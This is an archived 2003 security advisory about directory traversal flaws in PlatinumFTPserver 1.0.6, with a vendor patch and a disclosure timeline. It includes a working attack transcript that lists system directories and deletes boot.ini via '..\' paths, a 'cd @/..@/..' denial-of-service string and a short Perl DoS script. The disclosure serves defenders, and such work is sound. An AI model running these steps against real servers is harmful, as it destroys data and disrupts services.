exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

platinumserver.ftp.txt

platinumserver.ftp.txt
Posted Jan 6, 2003
Authored by Matrix

The Platinum FTP Server v1.06 contains remote directory traversal vulnerabilities that allow denial of service, list any directory on the server, and possibly arbitrary file deletion. Denial of service exploit in perl included. Fix available here.

tags | advisory, remote, denial of service, arbitrary, perl, vulnerability
SHA-256 | a8bc055674587d2f973081399e32d98230ea6742287042f8447672f8eb93bdab

platinumserver.ftp.txt

Change Mirror Download
              Multiple vulnerabilities found in 
PlatinumFTPserver V1.0.6
PlatinumFTPserver (C)2002 BYTE/400 LTD

Discovered by Matrix
http://www.infowarfare.dk
------------------------------------------------------------------------


SUMMARY

PlatinumFTPserver simplifies management of all your Ftp clients with regards
to sending and receiving program and data files over an IP connection.
Working within a control screen, PlatinumFTPserver gives you total
control: you can create and manage users, user groups and root directories.
You can define what Ftp Commands the users or groups can access.
PlatinumFTPserver provides activity logs, client connection details, file
and megabyte graphical statistics by session and day, virtual folders and a
built in Web Browser. The server engine runs as an application on Windows 9x
and a service under NT/2K/XP.
PlatinumFTPserver can bind to one or all IP addresses within the PC. All
configuration data for the server including password and description fields
are encrypted using the powerful Blowfish cipher. Clients can request files
be zipped before transfer, execute scripts created with the VBscript editor
and also access the shell process.
A vulnerability in the product allows remote attackers to cause
the server to traverse into directories that reside outside the bounding
FTP root directory, delete files and preform a DoS attack on the server.

DETAILS

Vulnerable systems:
* PlatinumFTPServer version 1.0.6
Also with installed patch released 14. dec. 2002

Immune systems:
* PlatinumFTPServer version 1.0.7

PlatinumFTP failure to filter out "..\" sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure; Possibility for deleting files and
preforming
a DoS attack on the server.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to support@PlatinumFTP.com
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete ..\..\..\..\boot.ini
250 delete command successful.
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd @/..@/..
ftp> bye
221 Goodbye.

Analysis:
1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected Platinum's
FTP server can exploit the vulnerability and freely browse the target
system's directory structure. Such information could prove useful in
subsequent attacks as well as provide information useful for an attacker
to successfully conduct social engineering attacks.

2: DELETE Command vulnerability
With this command it is possible to the attacker to destroy data on the server.
as you can see in the exploiting part it is fairly simple to do so.

3: CD Command vulnerability
The last command "cd @/..@/.." will cause a DoS attack on the server where
the server will use 99% og the CPU time.

Exploit code:
------------------------------------- CUT HERE --------------------------------
---------
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Matrix - Matrix@infowarfare.dk
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;


$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";

system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");

print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;

------------------------------------- CUT HERE --------------------------------
---------



Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
I have patched the server so that no reference to ../ can be done on any
command issued from the client.
Thanks for notifying me of this problem
Regards
Chris

PlatinumFTPServer version 1.0.7 fixes this issue. The latest version is
available from http://www.platinumftp.com/platinumftpserver.php


Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified (support@PlatinumFTP.com)
01/05/2002 Responses received from support@PlatinumFTP.com
01/05/2002 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Matrix





-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close